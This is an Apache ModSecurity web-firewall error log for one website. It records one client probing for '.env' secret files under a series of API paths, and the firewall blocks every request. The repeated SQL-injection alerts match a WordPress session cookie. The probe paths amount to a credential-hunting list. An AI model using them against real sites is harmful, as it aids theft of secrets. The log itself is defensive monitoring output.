[Mon May 11 16:33:36.351233 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XwAAAQs"]
[Mon May 11 16:33:36.351482 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XwAAAQs"]
[Mon May 11 16:33:36.521373 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YAAAAQs"]
[Mon May 11 16:33:36.521691 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YAAAAQs"]
[Mon May 11 16:33:36.521851 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YAAAAQs"]
[Mon May 11 16:33:36.522067 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YAAAAQs"]
[Mon May 11 16:33:36.678599 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YgAAAQs"]
[Mon May 11 16:33:36.678997 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YgAAAQs"]
[Mon May 11 16:33:36.679196 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YgAAAQs"]
[Mon May 11 16:33:36.679459 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YgAAAQs"]
[Mon May 11 16:33:36.837081 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YwAAAQs"]
[Mon May 11 16:33:36.837476 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YwAAAQs"]
[Mon May 11 16:33:36.837674 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YwAAAQs"]
[Mon May 11 16:33:36.837902 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_YwAAAQs"]
[Mon May 11 16:33:36.996112 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHowEWKUxpmnkK7zHx_ZAAAAQs"]
[Mon May 11 16:33:36.996493 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHowEWKUxpmnkK7zHx_ZAAAAQs"]
[Mon May 11 16:33:36.996681 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHowEWKUxpmnkK7zHx_ZAAAAQs"]
[Mon May 11 16:33:36.996899 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHowEWKUxpmnkK7zHx_ZAAAAQs"]
[Mon May 11 16:33:37.153501 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZQAAAQs"]
[Mon May 11 16:33:37.153879 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZQAAAQs"]
[Mon May 11 16:33:37.154064 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZQAAAQs"]
[Mon May 11 16:33:37.154297 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZQAAAQs"]
[Mon May 11 16:33:37.310849 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZgAAAQs"]
[Mon May 11 16:33:37.311248 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZgAAAQs"]
[Mon May 11 16:33:37.311450 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZgAAAQs"]
[Mon May 11 16:33:37.311700 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZgAAAQs"]
[Mon May 11 16:33:37.468024 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZwAAAQs"]
[Mon May 11 16:33:37.468426 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZwAAAQs"]
[Mon May 11 16:33:37.468618 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZwAAAQs"]
[Mon May 11 16:33:37.468865 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHowUWKUxpmnkK7zHx_ZwAAAQs"]
[Mon May 11 16:33:37.625343 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aAAAAQs"]
[Mon May 11 16:33:37.625710 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aAAAAQs"]
[Mon May 11 16:33:37.625894 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aAAAAQs"]
[Mon May 11 16:33:37.626123 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aAAAAQs"]
[Mon May 11 16:33:37.782424 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aQAAAQs"]
[Mon May 11 16:33:37.782811 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHowUWKUxpmnkK7zHx_aQAAAQs"]
